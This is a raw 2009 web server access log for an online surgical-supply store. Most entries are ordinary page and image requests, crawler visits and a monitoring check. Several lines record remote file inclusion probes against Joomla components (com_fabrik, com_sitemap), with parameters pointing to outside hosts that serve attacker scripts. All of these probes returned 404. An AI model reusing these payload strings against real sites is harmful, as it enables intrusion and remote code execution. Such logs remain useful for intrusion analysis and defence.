24.61.50.47 - - [04/Sep/2009:00:15:05 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:05 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:05 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:05 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:06 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:06 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:06 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:06 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:06 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:06 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:06 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:06 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:06 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:11 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:15 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L018B42400737230092D503R+M37+ENG HTTP/1.1" 200 59064 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:16 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B42400737230092D503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:16 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B42400737230092D503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:16 -0400] "GET /images/next.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B42400737230092D503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:30 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG HTTP/1.1" 200 59367 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B42400737230092D503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:15:31 -0400] "GET /images/prev.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
211.218.40.180 - - [04/Sep/2009:00:15:47 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.museoscout.com.ar/templates/did.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
123.125.66.68 - - [04/Sep/2009:00:17:01 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
193.192.122.30 - - [04/Sep/2009:00:17:41 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
193.192.122.30 - - [04/Sep/2009:00:17:41 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
193.192.122.30 - - [04/Sep/2009:00:17:47 -0400] "GET /logs/access_log.Q109070800//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Sep/2009:00:19:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
204.3.129.73 - - [04/Sep/2009:00:19:14 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.0" 404 233 "-" "Mozilla/5.0"
204.3.129.73 - - [04/Sep/2009:00:19:14 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.0" 404 238 "-" "Mozilla/5.0"
193.192.122.30 - - [04/Sep/2009:00:19:15 -0400] "GET /logs/access_log.Q109070800%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
204.3.129.73 - - [04/Sep/2009:00:19:19 -0400] "GET /logs/access_log.Q109070800//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://civitatis.superweb.ws/game/id.txt?? HTTP/1.0" 404 260 "-" "Mozilla/5.0"
24.61.50.47 - - [04/Sep/2009:00:19:21 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:21 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:21 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:21 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:21 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:21 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:21 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:21 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:21 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:21 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:21 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:21 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:21 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:21 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:21 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:21 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:21 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:21 -0400] "GET /images/prev.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:21 -0400] "GET /images/next.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:22 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:22 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:22 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:22 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:22 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:22 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:22 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:22 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:22 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:22 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B424C04C7530093E503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
24.61.50.47 - - [04/Sep/2009:00:19:59 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L018B42400737230092D503R+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SU 3.23; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322; OfficeLiveConnector.1.4; OfficeLivePatch.0.0)"
